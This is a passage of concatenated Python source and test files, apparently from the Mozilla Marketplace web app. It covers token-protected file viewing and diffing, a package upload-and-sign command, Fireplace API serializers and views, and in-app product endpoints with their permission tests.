res = self.client.get(self.files_serve(binary) + '?token=aasd')
eq_(res.status_code, 403)
def test_serve_bad_token(self):
self.file_viewer.extract()
res = self.client.get(self.files_serve(binary) + '?token=a asd')
eq_(res.status_code, 403)
def test_serve_get_token(self):
self.file_viewer.extract()
res = self.client.get(self.files_redirect(binary))
eq_(res.status_code, 302)
url = res['Location']
assert url.startswith(settings.STATIC_URL)
assert urlparse.urlparse(url).query.startswith('token=')
def test_memcache_goes_bye_bye(self):
self.file_viewer.extract()
res = self.client.get(self.files_redirect(binary))
url = res['Location'][len(settings.STATIC_URL) - 1:]
cache.clear()
res = self.client.get(url)
eq_(res.status_code, 403)
def test_bounce(self):
# Don't run this test if the server has x-sendfile turned off.
if not settings.XSENDFILE:
raise SkipTest()
self.file_viewer.extract()
res = self.client.get(self.files_redirect(binary), follow=True)
eq_(res.status_code, 200)
eq_(res[settings.XSENDFILE_HEADER],
self.file_viewer.get_files().get(binary)['full'])
@patch.object(settings, 'FILE_VIEWER_SIZE_LIMIT', 5)
def test_file_size(self):
self.file_viewer.extract()
res = self.client.get(self.file_url(not_binary))
doc = pq(res.content)
assert doc('.error').text().startswith('File size is')
def test_poll_failed(self):
msg = Message('file-viewer:%s' % self.file_viewer)
msg.save('I like cheese.')
res = self.client.get(self.poll_url())
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(data['status'], False)
eq_(data['msg'], ['I like cheese.'])
def test_file_chooser_selection(self):
res = self.client.get(self.file_url())
doc = pq(res.content)
eq_(doc('#id_left option[selected]').attr('value'),
str(self.files[0].id))
eq_(len(doc('#id_right option[value][selected]')), 0)
class TestDiffViewer(FilesBase, amo.tests.WebappTestCase):
fixtures = ['base/apps', 'base/users'] + fixture('webapp_337141')
def setUp(self):
super(TestDiffViewer, self).setUp()
self.file_viewer = DiffHelper(self.files[0], self.files[1])
def poll_url(self):
return reverse('mkt.files.compare.poll', args=[self.files[0].pk,
self.files[1].pk])
def add_file(self, file_obj, name, contents):
dest = os.path.join(file_obj.dest, name)
open(dest, 'w').write(contents)
def file_url(self, file=None):
args = [self.files[0].pk, self.files[1].pk]
if file:
args.extend(['file', file])
return reverse('mkt.files.compare', args=args)
def check_urls(self, status):
for url in [self.poll_url(), self.file_url()]:
status_code = self.client.get(url).status_code
assert status_code == status, (
'Request to %s returned status code %d (expected %d)' %
(url, status_code, status))
def test_tree_no_file(self):
self.file_viewer.extract()
res = self.client.get(self.file_url('doesnotexist.js'))
eq_(res.status_code, 404)
def test_content_file(self):
self.file_viewer.extract()
res = self.client.get(self.file_url(not_binary))
doc = pq(res.content)
eq_(len(doc('pre')), 3)
def test_binary_serve_links(self):
self.file_viewer.extract()
res = self.client.get(self.file_url(binary))
doc = pq(res.content)
node = doc('#content-wrapper a')
eq_(len(node), 2)
assert node[0].text.startswith('Download 256.png')
def test_view_both_present(self):
self.file_viewer.extract()
res = self.client.get(self.file_url(not_binary))
doc = pq(res.content)
eq_(len(doc('pre')), 3)
eq_(len(doc('#content-wrapper p')), 4)
def test_view_one_missing(self):
self.file_viewer.extract()
os.remove(os.path.join(self.file_viewer.right.dest, 'manifest.webapp'))
res = self.client.get(self.file_url(not_binary))
doc = pq(res.content)
eq_(len(doc('pre')), 3)
eq_(len(doc('#content-wrapper p')), 2)
def test_view_left_binary(self):
self.file_viewer.extract()
filename = os.path.join(self.file_viewer.left.dest, 'manifest.webapp')
open(filename, 'w').write('MZ')
res = self.client.get(self.file_url(not_binary))
assert 'This file is not viewable online' in res.content
def test_view_right_binary(self):
self.file_viewer.extract()
filename = os.path.join(self.file_viewer.right.dest, 'manifest.webapp')
open(filename, 'w').write('MZ')
assert not self.file_viewer.is_diffable()
res = self.client.get(self.file_url(not_binary))
assert 'This file is not viewable online' in res.content
def test_different_tree(self):
self.file_viewer.extract()
os.remove(os.path.join(self.file_viewer.left.dest, not_binary))
res = self.client.get(self.file_url(not_binary))
doc = pq(res.content)
eq_(doc('h4:last').text(), 'Deleted files:')
eq_(len(doc('ul.root')), 2)
def test_file_chooser_selection(self):
res = self.client.get(self.file_url())
doc = pq(res.content)
eq_(doc('#id_left option[selected]').attr('value'),
str(self.files[0].id))
eq_(doc('#id_right option[selected]').attr('value'),
str(self.files[1].id))
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from . import views
file_patterns = patterns('',
url(r'^$', views.browse, name='mkt.files.list'),
url(r'^(?P<type_>fragment|file)/(?P<key>.*)$', views.browse,
name='mkt.files.list'),
url(r'file-redirect/(?P<key>.*)$', views.redirect,
name='mkt.files.redirect'),
url(r'file-serve/(?P<key>.*)$', views.serve, name='mkt.files.serve'),
url(r'status$', views.poll, name='mkt.files.poll'),
)
compare_patterns = patterns('',
url(r'^$', views.compare, name='mkt.files.compare'),
url(r'(?P<type_>fragment|file)/(?P<key>.*)$', views.compare,
name='mkt.files.compare'),
url(r'status$', views.compare_poll, name='mkt.files.compare.poll'),
)
urlpatterns = patterns('',
('^browse/(?P<file_id>\d+)/', include(file_patterns)),
('^compare/(?P<one_id>\d+)\.{3}(?P<two_id>\d+)/',
include(compare_patterns)),
)
########NEW FILE########
__FILENAME__ = views
from urlparse import urljoin
from django import http, shortcuts
from django.conf import settings
from django.core.urlresolvers import reverse
from django.shortcuts import render
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import condition
import commonware.log
from cache_nuggets.lib import Message, Token
from tower import ugettext as _
from access import acl
from amo.decorators import json_view
from amo.utils import HttpResponseSendFile, urlparams
from files import forms
from files.decorators import (etag, webapp_file_view, compare_webapp_file_view,
webapp_file_view_token, last_modified)
from files.tasks import extract_file
log = commonware.log.getLogger('z.addons')
def setup_viewer(request, file_obj):
data = {'file': file_obj,
'version': file_obj.version,
'addon': file_obj.version.addon,
'status': False,
'selected': {},
'validate_url': ''}
if (acl.check_reviewer(request) or
acl.check_addon_ownership(request, file_obj.version.addon,
viewer=True, ignore_disabled=True)):
data['validate_url'] = reverse(
'mkt.developers.apps.json_file_validation',
args=[file_obj.version.addon.app_slug, file_obj.id])
if acl.check_reviewer(request):
data['file_link'] = {'text': _('Back to review'),
'url': reverse('reviewers.apps.review',
args=[data['addon'].app_slug])}
else:
data['file_link'] = {
'text': _('Back to app'),
'url': reverse('detail', args=[data['addon'].pk])
}
return data
@never_cache
@json_view
@webapp_file_view
def poll(request, viewer):
return {'status': viewer.is_extracted(),
'msg': [Message('file-viewer:%s' % viewer).get(delete=True)]}
def check_compare_form(request, form):
if request.method == 'POST':
if form.is_valid():
left = form.cleaned_data['left']
right = form.cleaned_data.get('right')
if right:
url = reverse('mkt.files.compare', args=[left, right])
else:
url = reverse('mkt.files.list', args=[left])
else:
url = request.path
return shortcuts.redirect(url)
@csrf_exempt
@webapp_file_view
@condition(etag_func=etag, last_modified_func=last_modified)
def browse(request, viewer, key=None, type_='file'):
form = forms.FileCompareForm(request.POST or None, addon=viewer.addon,
initial={'left': viewer.file})
response = check_compare_form(request, form)
if response:
return response
data = setup_viewer(request, viewer.file)
data['viewer'] = viewer
data['poll_url'] = reverse('mkt.files.poll', args=[viewer.file.id])
data['form'] = form
if not viewer.is_extracted():
extract_file(viewer)
if viewer.is_extracted():
data.update({'status': True, 'files': viewer.get_files()})
key = viewer.get_default(key)
if key not in data['files']:
raise http.Http404
viewer.select(key)
data['key'] = key
binary = viewer.is_binary()
if (not viewer.is_directory() and
(not binary or binary != 'image')):
data['content'] = viewer.read_file()
else:
extract_file.delay(viewer)
tmpl = 'content' if type_ == 'fragment' else 'viewer'
return render(request, 'fileviewer/%s.html' % tmpl, data)
@never_cache
@compare_webapp_file_view
@json_view
def compare_poll(request, diff):
msgs = []
for f in (diff.left, diff.right):
m = Message('file-viewer:%s' % f).get(delete=True)
if m:
msgs.append(m)
return {'status': diff.is_extracted(), 'msg': msgs}
@csrf_exempt
@compare_webapp_file_view
@condition(etag_func=etag, last_modified_func=last_modified)
def compare(request, diff, key=None, type_='file'):
form = forms.FileCompareForm(request.POST or None, addon=diff.addon,
initial={'left': diff.left.file,
'right': diff.right.file})
response = check_compare_form(request, form)
if response:
return response
data = setup_viewer(request, diff.left.file)
data['diff'] = diff
data['poll_url'] = reverse('mkt.files.compare.poll',
args=[diff.left.file.id,
diff.right.file.id])
data['form'] = form
if not diff.is_extracted():
extract_file(diff.left)
extract_file(diff.right)
if diff.is_extracted():
data.update({'status': True,
'files': diff.get_files(),
'files_deleted': diff.get_deleted_files()})
key = diff.left.get_default(key)
if key not in data['files'] and key not in data['files_deleted']:
raise http.Http404
diff.select(key)
data['key'] = key
if diff.is_diffable():
data['left'], data['right'] = diff.read_file()
else:
extract_file.delay(diff.left)
extract_file.delay(diff.right)
tmpl = 'content' if type_ == 'fragment' else 'viewer'
return render(request, 'fileviewer/%s.html' % tmpl, data)
@webapp_file_view
def redirect(request, viewer, key):
new = Token(data=[viewer.file.id, key])
new.save()
url = urljoin(settings.STATIC_URL,
reverse('mkt.files.serve', args=[viewer, key]))
url = urlparams(url, token=new.token)
return http.HttpResponseRedirect(url)
@webapp_file_view_token
def serve(request, viewer, key):
"""
This is to serve files off of st.a.m.o, not standard a.m.o. For this we
use token based authentication.
"""
files = viewer.get_files()
obj = files.get(key)
if not obj:
log.error(u'Couldn\'t find %s in %s (%d entries) for file %s' %
(key, files.keys()[:10], len(files.keys()), viewer.file.id))
raise http.Http404()
return HttpResponseSendFile(request, obj['full'],
content_type=obj['mimetype'])
########NEW FILE########
__FILENAME__ = upload_new_marketplace_package
import os
import os.path
from datetime import datetime
from django.core.management.base import BaseCommand, CommandError
from django.db import transaction, connections
import commonware.log
import amo
from amo.decorators import use_master
from files.models import FileUpload
from mkt.webapps.models import Webapp
from versions.models import Version
log = commonware.log.getLogger('mkt.fireplace.commands')
class Command(BaseCommand):
help = ('Upload and sign a new version of the Marketplace packaged app.\n'
'Syntax:\n./manage.py upload_new_marketplace_package <path-to-zip>')
def info(self, msg):
log.info(msg)
self.stdout.write(msg)
self.stdout.flush()
def upload(self, addon, path):
"""Create FileUpload instance from local file."""
self.info('Creating FileUpload...')
package_file = open(path)
package_size = os.stat(path).st_size
upload = FileUpload()
upload.user = addon.authors.all()[0]
upload.add_file(package_file.read(), 'marketplace-package.zip',
package_size, is_webapp=True)
self.info('Created FileUpload %s.' % upload)
return upload
def create_version(self, addon, upload):
"""Create new Version instance from a FileUpload instance"""
self.info('Creating new Version...')
version = Version.from_upload(upload, addon, [amo.PLATFORM_ALL])
self.info('Created new Version %s.' % version)
return version
def sign_and_publicise(self, addon, version):
"""Sign the version we just created and make it public."""
# Note: most of this is lifted from mkt/reviewers/utils.py, but without
# the dependency on `request` and isolating only what we need.
self.info('Signing version...')
addon.sign_if_packaged(version.pk)
self.info('Signing version %s done.' % version)
self.info('Setting File to public...')
file_ = version.all_files[0]
file_.update(_signal=False, datestatuschanged=datetime.now(),
reviewed=datetime.now(), status=amo.STATUS_PUBLIC)
self.info('File for version %s set to public.' % version)
self.info('Setting version %s as the current version...' % version)
version.update(_signal=False, reviewed=datetime.now())
addon.update_version(_signal=False)
self.info('Set version %s as the current version.' % version)
@use_master
def handle(self, *args, **options):
try:
path = args[0]
except IndexError:
raise CommandError(self.help)
if not path.endswith('.zip'):
raise CommandError('File does not look like a zip file.')
if not os.path.exists(path):
raise CommandError('File does not exist')
addon = Webapp.objects.get(app_slug='marketplace-package')
# Wrap everything we're doing in a transaction, if there is an uncaught
# exception everything will be rolled back. We force a connect() call
# first to work around django-mysql-pool problems (autocommit state is
# not properly reset, messing up transaction.atomic() blocks).
connections['default'].connect()
with transaction.atomic():
upload = self.upload(addon, path)
version = self.create_version(addon, upload)
self.sign_and_publicise(addon, version)
self.info('Excellent! Version %s is the now live \o/' % version)
########NEW FILE########
__FILENAME__ = serializers
from rest_framework.serializers import SerializerMethodField
from mkt.collections.serializers import (CollectionSerializer,
CollectionMembershipField)
from mkt.search.serializers import SimpleESAppSerializer
from mkt.webapps.serializers import SimpleAppSerializer
class BaseFireplaceAppSerializer(object):
def get_icons(self, app):
# Fireplace only requires 64px-sized icons.
return {64: app.get_icon_url(64)}
class FireplaceAppSerializer(BaseFireplaceAppSerializer, SimpleAppSerializer):
class Meta(SimpleAppSerializer.Meta):
fields = ['author', 'banner_message', 'banner_regions', 'categories',
'content_ratings', 'current_version', 'description',
'device_types', 'homepage', 'icons', 'id', 'is_packaged',
'manifest_url', 'name', 'payment_required', 'premium_type',
'previews', 'price', 'price_locale', 'privacy_policy',
'public_stats', 'release_notes', 'ratings', 'slug', 'status',
'support_email', 'support_url', 'upsell', 'user']
exclude = []
class FireplaceESAppSerializer(BaseFireplaceAppSerializer,
SimpleESAppSerializer):
weight = SerializerMethodField('get_weight')
class Meta(SimpleESAppSerializer.Meta):
fields = sorted(FireplaceAppSerializer.Meta.fields + ['weight'])
exclude = FireplaceAppSerializer.Meta.exclude
def get_weight(self, obj):
return obj.es_data.get('weight', 1)
def get_user_info(self, app):
# Fireplace search should always be anonymous for extra-cacheability.
return None
class FireplaceCollectionMembershipField(CollectionMembershipField):
app_serializer_classes = {
'es': FireplaceESAppSerializer,
'normal': FireplaceAppSerializer,
}
class FireplaceCollectionSerializer(CollectionSerializer):
apps = FireplaceCollectionMembershipField(many=True, source='apps')
########NEW FILE########
__FILENAME__ = test_views
import json
from urlparse import urlparse
from django.core.urlresolvers import reverse
from django.db.models.query import QuerySet
from mock import patch
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import mkt
from addons.models import AddonUser
from amo.tests import app_factory, ESTestCase, TestCase
from mkt.api.tests import BaseAPI
from mkt.api.tests.test_oauth import RestOAuth
from mkt.collections.constants import COLLECTIONS_TYPE_BASIC
from mkt.collections.models import Collection
from mkt.fireplace.serializers import FireplaceAppSerializer
from mkt.search.utils import S
from mkt.site.fixtures import fixture
from mkt.webapps.models import Installed
from mkt.webapps.models import Webapp
from users.models import UserProfile
# https://bugzilla.mozilla.org/show_bug.cgi?id=958608#c1 and #c2.
FIREPLACE_EXCLUDED_FIELDS = (
'absolute_url', 'app_type', 'created', 'default_locale', 'payment_account',
'regions', 'resource_uri', 'supported_locales', 'tags', 'upsold',
'versions', 'weekly_downloads')
class TestAppDetail(BaseAPI):
fixtures = fixture('webapp_337141')
def setUp(self):
super(TestAppDetail, self).setUp()
self.url = reverse('fireplace-app-detail', kwargs={'pk': 337141})
def test_get(self):
res = self.client.get(self.url)
data = json.loads(res.content)
eq_(data['id'], 337141)
for field in FIREPLACE_EXCLUDED_FIELDS:
ok_(not field in data, field)
for field in FireplaceAppSerializer.Meta.fields:
ok_(field in data, field)
def test_get_slug(self):
Webapp.objects.get(pk=337141).update(app_slug='foo')
res = self.client.get(reverse('fireplace-app-detail',
kwargs={'pk': 'foo'}))
data = json.loads(res.content)
eq_(data['id'], 337141)
def test_others(self):
url = reverse('fireplace-app-list')
self._allowed_verbs(self.url, ['get'])
self._allowed_verbs(url, [])
class TestFeaturedSearchView(RestOAuth, ESTestCase):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
super(TestFeaturedSearchView, self).setUp()
self.webapp = Webapp.objects.get(pk=337141)
collection = Collection.objects.create(name='Hi', description='Mom',
collection_type=COLLECTIONS_TYPE_BASIC, is_public=True)
collection.add_app(self.webapp)
self.reindex(Webapp, 'webapp')
self.url = reverse('fireplace-featured-search-api')
def test_get(self):
res = self.client.get(self.url)
eq_(res.status_code, 200)
objects = res.json['objects']
eq_(len(objects), 1)
data = objects[0]
eq_(data['id'], 337141)
for field in FIREPLACE_EXCLUDED_FIELDS:
ok_(not field in data, field)
for field in FireplaceAppSerializer.Meta.fields:
ok_(field in data, field)
ok_('collections' in res.json)
eq_(res.json['collections'][0]['name'], {u'en-US': u'Hi'})
data = res.json['collections'][0]['apps'][0]
for field in FIREPLACE_EXCLUDED_FIELDS:
ok_(not field in data, field)
for field in FireplaceAppSerializer.Meta.fields:
ok_(field in data, field)
ok_('featured' in res.json)
ok_('operator' in res.json)
def test_only_64px_icons(self):
res = self.client.get(self.url)
eq_(res.status_code, 200)
objects = res.json['objects']
data = objects[0]['icons']
eq_(len(data), 1)
eq_(urlparse(data['64'])[0:3],
urlparse(self.webapp.get_icon_url(64))[0:3])
class TestCollectionViewSet(RestOAuth, ESTestCase):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
super(TestCollectionViewSet, self).setUp()
self.webapp = Webapp.objects.get(pk=337141)
collection = Collection.objects.create(name='Hi', description='Mom',
collection_type=COLLECTIONS_TYPE_BASIC, is_public=True)
collection.add_app(self.webapp)
self.reindex(Webapp, 'webapp')
self.url = reverse('fireplace-collection-detail',
kwargs={'pk': collection.pk})
def test_get(self):
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res.json['name'], {u'en-US': u'Hi'})
data = res.json['apps'][0]
for field in FIREPLACE_EXCLUDED_FIELDS:
ok_(not field in data, field)
for field in FireplaceAppSerializer.Meta.fields:
ok_(field in data, field)
@patch('mkt.collections.serializers.CollectionMembershipField.to_native')
def test_get_preview(self, mock_field_to_native):
mock_field_to_native.return_value = []
res = self.client.get(self.url, {'preview': 1})
eq_(res.status_code, 200)
eq_(res.json['name'], {u'en-US': u'Hi'})
eq_(res.json['apps'], [])
eq_(mock_field_to_native.call_count, 1)
ok_(isinstance(mock_field_to_native.call_args[0][0], QuerySet))
eq_(mock_field_to_native.call_args[1].get('use_es', False), False)
@patch('mkt.collections.serializers.CollectionMembershipField.to_native')
def test_no_get_preview(self, mock_field_to_native):
mock_field_to_native.return_value = []
res = self.client.get(self.url)
eq_(res.status_code, 200)
eq_(res.json['name'], {u'en-US': u'Hi'})
eq_(res.json['apps'], [])
eq_(mock_field_to_native.call_count, 1)
ok_(isinstance(mock_field_to_native.call_args[0][0], S))
eq_(mock_field_to_native.call_args[1].get('use_es', False), True)
class TestSearchView(RestOAuth, ESTestCase):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
super(TestSearchView, self).setUp()
self.webapp = Webapp.objects.get(pk=337141)
self.reindex(Webapp, 'webapp')
self.url = reverse('fireplace-search-api')
def test_get(self):
res = self.client.get(self.url)
eq_(res.status_code, 200)
objects = res.json['objects']
eq_(len(objects), 1)
data = objects[0]
eq_(data['id'], 337141)
for field in FIREPLACE_EXCLUDED_FIELDS:
ok_(not field in data, field)
for field in FireplaceAppSerializer.Meta.fields:
ok_(field in data, field)
ok_(not 'featured' in res.json)
ok_(not 'collections' in res.json)
ok_(not 'operator' in res.json)
def test_anonymous_user(self):
res = self.anon.get(self.url)
eq_(res.status_code, 200)
data = res.json['objects'][0]
eq_(data['user'], None)
res = self.client.get(self.url)
eq_(res.status_code, 200)
data = res.json['objects'][0]
eq_(data['user'], None)
class TestConsumerInfoView(RestOAuth, TestCase):
fixtures = fixture('user_2519')
def setUp(self):
super(TestConsumerInfoView, self).setUp()
self.request = RequestFactory().get('/')
self.url = reverse('fireplace-consumer-info')
self.user = UserProfile.objects.get(pk=2519)
@patch('mkt.regions.middleware.RegionMiddleware.region_from_request')
def test_no_user_just_region(self, region_from_request):
region_from_request.return_value = mkt.regions.UK
res = self.anon.get(self.url)
data = json.loads(res.content)
eq_(data['region'], 'uk')
ok_(not 'apps' in data)
@patch('mkt.regions.middleware.RegionMiddleware.region_from_request')
def test_with_user_developed(self, region_from_request):
region_from_request.return_value = mkt.regions.BR
developed_app = app_factory()
AddonUser.objects.create(user=self.user, addon=developed_app)
self.client.login(username=self.user.email, password='password')
res = self.client.get(self.url)
data = json.loads(res.content)
eq_(data['region'], 'br')
eq_(data['apps']['installed'], [])
eq_(data['apps']['developed'], [developed_app.pk])
eq_(data['apps']['purchased'], [])
@patch('mkt.regions.middleware.RegionMiddleware.region_from_request')
def test_with_user_installed(self, region_from_request):
region_from_request.return_value = mkt.regions.BR
installed_app = app_factory()
Installed.objects.create(user=self.user, addon=installed_app)
self.client.login(username=self.user.email, password='password')
res = self.client.get(self.url)
data = json.loads(res.content)
eq_(data['region'], 'br')
eq_(data['apps']['installed'], [installed_app.pk])
eq_(data['apps']['developed'], [])
eq_(data['apps']['purchased'], [])
@patch('users.models.UserProfile.purchase_ids')
@patch('mkt.regions.middleware.RegionMiddleware.region_from_request')
def test_with_user_purchased(self, region_from_request, purchase_ids):
region_from_request.return_value = mkt.regions.BR
purchased_app = app_factory()
purchase_ids.return_value = [purchased_app.pk]
self.client.login(username=self.user.email, password='password')
res = self.client.get(self.url)
data = json.loads(res.content)
eq_(data['region'], 'br')
eq_(data['apps']['installed'], [])
eq_(data['apps']['developed'], [])
eq_(data['apps']['purchased'], [purchased_app.pk])
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from rest_framework.routers import SimpleRouter
from mkt.fireplace.views import (AppViewSet, CollectionViewSet,
ConsumerInfoView, FeaturedSearchView, SearchView)
apps = SimpleRouter()
apps.register(r'app', AppViewSet, base_name='fireplace-app')
collections = SimpleRouter()
collections.register(r'collection', CollectionViewSet,
base_name='fireplace-collection')
urlpatterns = patterns('',
url(r'^fireplace/', include(apps.urls)),
url(r'^fireplace/', include(collections.urls)),
url(r'^fireplace/consumer-info/',
ConsumerInfoView.as_view(),
name='fireplace-consumer-info'),
url(r'^fireplace/search/featured/',
FeaturedSearchView.as_view(),
name='fireplace-featured-search-api'),
url(r'^fireplace/search/',
SearchView.as_view(),
name='fireplace-search-api'),
)
########NEW FILE########
__FILENAME__ = views
import json
from django.http import HttpResponse
from rest_framework.generics import RetrieveAPIView
from rest_framework.permissions import AllowAny
from mkt.account.views import user_relevant_apps
from mkt.api.base import CORSMixin
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.collections.views import CollectionViewSet as BaseCollectionViewSet
from mkt.fireplace.serializers import (FireplaceCollectionSerializer, FireplaceAppSerializer,
FireplaceESAppSerializer)
from mkt.search.views import (FeaturedSearchView as BaseFeaturedSearchView,
SearchView as BaseSearchView)
from mkt.webapps.views import AppViewSet as BaseAppViewset
class CollectionViewSet(BaseCollectionViewSet):
serializer_class = FireplaceCollectionSerializer
def get_serializer_context(self):
"""Context passed to the serializer. Since we are in Fireplace, we
always want to use ES to fetch apps."""
context = super(CollectionViewSet, self).get_serializer_context()
context['use-es-for-apps'] = not self.request.GET.get('preview')
return context
class AppViewSet(BaseAppViewset):
serializer_class = FireplaceAppSerializer
class FeaturedSearchView(BaseFeaturedSearchView):
serializer_class = FireplaceESAppSerializer
collections_serializer_class = FireplaceCollectionSerializer
authentication_classes = []
class SearchView(BaseSearchView):
serializer_class = FireplaceESAppSerializer
class ConsumerInfoView(CORSMixin, RetrieveAPIView):
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication,
RestAnonymousAuthentication]
cors_allowed_methods = ['get']
permission_classes = (AllowAny,)
def retrieve(self, request, *args, **kwargs):
data = {
'region': request.REGION.slug
}
if request.amo_user:
data['apps'] = user_relevant_apps(request.amo_user)
# Return an HttpResponse directly to be as fast as possible.
return HttpResponse(json.dumps(data),
content_type='application/json; charset=utf-8')
########NEW FILE########
__FILENAME__ = models
from django.core.urlresolvers import reverse
from django.db import models
from amo.models import ModelBase
from apps.translations.fields import save_signal, TranslatedField
from mkt.prices.models import Price
class InAppProduct(ModelBase):
"""
An item which is purchaseable from within a marketplace app.
"""
webapp = models.ForeignKey('webapps.WebApp')
price = models.ForeignKey(Price)
name = TranslatedField(require_locale=False)
logo_url = models.URLField(max_length=1024, null=True, blank=True)
class Meta:
db_table = 'inapp_products'
def __unicode__(self):
return u'%s: %s' % (self.webapp.name, self.name)
@property
def icon_url(self):
return self.logo_url or self.webapp.get_icon_url(64)
@property
def buy_url(self):
# FIXME: This should accept the id in the url instead of from JSON.
return reverse('webpay-prepare-inapp')
models.signals.pre_save.connect(save_signal, sender=InAppProduct,
dispatch_uid='inapp_products_translations')
########NEW FILE########
__FILENAME__ = serializers
from django import forms
from rest_framework import serializers
from mkt.api.forms import SchemeURLValidator as URLValidator
from mkt.inapp.models import InAppProduct
class InAppProductSerializer(serializers.ModelSerializer):
id = serializers.IntegerField(read_only=True)
app = serializers.SlugRelatedField(read_only=True, slug_field='app_slug',
source='webapp')
price_id = serializers.PrimaryKeyRelatedField(source='price')
name = serializers.CharField()
logo_url = serializers.CharField(
validators=[URLValidator(schemes=['http', 'https'])],
required=False)
class Meta:
model = InAppProduct
fields = ['id', 'app', 'price_id', 'name', 'logo_url']
class InAppProductForm(forms.ModelForm):
class Meta:
model = InAppProduct
fields = ['price',]
########NEW FILE########
__FILENAME__ = test_serializers
from nose.tools import eq_, ok_
import amo.tests
from mkt.inapp.serializers import InAppProductSerializer
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from mkt.prices.models import Price
class TestInAppProductSerializer(amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'prices')
def setUp(self):
self.webapp = Webapp.objects.get(pk=337141)
price = Price.objects.all()[0]
self.valid_product_data = {
'name': 'Purple Gems',
'logo_url': 'https://marketplace.firefox.com/rocket.png',
'price_id': price.id,
}
def test_valid(self):
serializer = InAppProductSerializer(data=self.valid_product_data)
ok_(serializer.is_valid())
def test_no_logo_url(self):
product_data = dict(self.valid_product_data)
del product_data['logo_url']
serializer = InAppProductSerializer(data=product_data)
ok_(serializer.is_valid())
def test_create_ftp_scheme(self):
product_data = dict(self.valid_product_data)
product_data['logo_url'] = 'ftp://example.com/awesome.png'
serializer = InAppProductSerializer(data=product_data)
ok_(not serializer.is_valid())
eq_(serializer.errors['logo_url'],
['Scheme should be one of http, https.'])
########NEW FILE########
__FILENAME__ = test_views
import json
from django.core.urlresolvers import reverse
from nose.tools import eq_
from rest_framework import status
import amo.tests
from users.models import UserProfile
from mkt.api.tests.test_oauth import RestOAuthClient
from mkt.api.models import Access, generate
from mkt.inapp.models import InAppProduct
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from mkt.prices.models import Price
class BaseInAppProductViewSetTests(amo.tests.TestCase):
def setUp(self):
self.webapp = Webapp.objects.get(pk=337141)
price = Price.objects.all()[0]
self.valid_in_app_product_data = {
'name': 'Purple Gems',
'logo_url': 'https://marketplace.firefox.com/rocket.png',
'price_id': price.id,
}
def setup_client(self, user):
access = Access.objects.create(key='test_oauth_key_owner',
secret=generate(), user=user)
return RestOAuthClient(access)
def list_url(self):
return reverse('in-app-products-list',
kwargs={'app_slug': self.webapp.app_slug})
def detail_url(self, pk):
app_slug = self.webapp.app_slug
return reverse('in-app-products-detail',
kwargs={'app_slug': app_slug, 'pk': pk})
def create_product(self):
product_data = {'webapp': self.webapp}
product_data.update(self.valid_in_app_product_data)
return InAppProduct.objects.create(**product_data)
def get(self, url):
return self.client.get(url)
def post(self, url, data):
return self.client.post(url, json.dumps(data),
content_type='application/json')
def put(self, url, data):
return self.client.put(url, json.dumps(data),
content_type='application/json')
def delete(self, url):
return self.client.delete(url)
class TestInAppProductViewSetAuthorized(BaseInAppProductViewSetTests):
fixtures = fixture('webapp_337141', 'prices')
def setUp(self):
super(TestInAppProductViewSetAuthorized, self).setUp()
user = self.webapp.authors.all()[0]
self.client = self.setup_client(user)
def test_create(self):
response = self.post(self.list_url(), self.valid_in_app_product_data)
eq_(response.status_code, status.HTTP_201_CREATED)
eq_(response.json['name'], 'Purple Gems')
def test_update(self):
product = self.create_product()
self.valid_in_app_product_data['name'] = 'Orange Gems'
response = self.put(self.detail_url(product.id),
self.valid_in_app_product_data)
eq_(response.status_code, status.HTTP_200_OK)
eq_(response.json['name'], 'Orange Gems')
eq_(response.json['name'], product.reload().name)
def test_list(self):
product1 = self.create_product()
product2 = self.create_product()
response = self.get(self.list_url())
eq_(response.status_code, status.HTTP_200_OK)
eq_(sorted([p['id'] for p in response.json['objects']]),
[product1.id, product2.id])
def test_detail(self):
product = self.create_product()
response = self.get(self.detail_url(product.id))
eq_(response.status_code, status.HTTP_200_OK)
eq_(response.json['id'], product.id)
def test_delete(self):
product = self.create_product()
delete_response = self.delete(self.detail_url(product.id))
eq_(delete_response.status_code, status.HTTP_403_FORBIDDEN)
class TestInAppProductViewSetUnauthorized(BaseInAppProductViewSetTests):
fixtures = fixture('user_999', 'webapp_337141', 'prices')
def setUp(self):
super(TestInAppProductViewSetUnauthorized, self).setUp()
user = UserProfile.objects.get(id=999)
self.client = self.setup_client(user)
def test_create(self):
response = self.post(self.list_url(),
self.valid_in_app_product_data)
eq_(response.status_code, status.HTTP_403_FORBIDDEN)
def test_update(self):
product = self.create_product()
self.valid_in_app_product_data['name'] = 'Orange Gems'
response = self.put(self.detail_url(product.id),
self.valid_in_app_product_data)
eq_(response.status_code, status.HTTP_403_FORBIDDEN)
def test_list(self):
self.create_product()
response = self.get(self.list_url())
eq_(response.status_code, status.HTTP_403_FORBIDDEN)
def test_detail(self):
product = self.create_product()
response = self.get(self.detail_url(product.id))
eq_(response.status_code, status.HTTP_403_FORBIDDEN)
def test_delete(self):
product = self.create_product()
response = self.delete(self.detail_url(product.id))
eq_(response.status_code, status.HTTP_403_FORBIDDEN)
########NEW FILE########
__FILENAME__ = views
from django.shortcuts import get_object_or_404
from rest_framework.permissions import AllowAny
from rest_framework.viewsets import ModelViewSet
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import AllowAuthor, ByHttpMethod
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.inapp.models import InAppProduct
from mkt.inapp.serializers import InAppProductSerializer
from mkt.webapps.models import Webapp
class InAppProductViewSet(CORSMixin, MarketplaceView, ModelViewSet):
serializer_class = InAppProductSerializer
cors_allowed_methods = ('get', 'post', 'put', 'delete')
permission_classes = [ByHttpMethod({
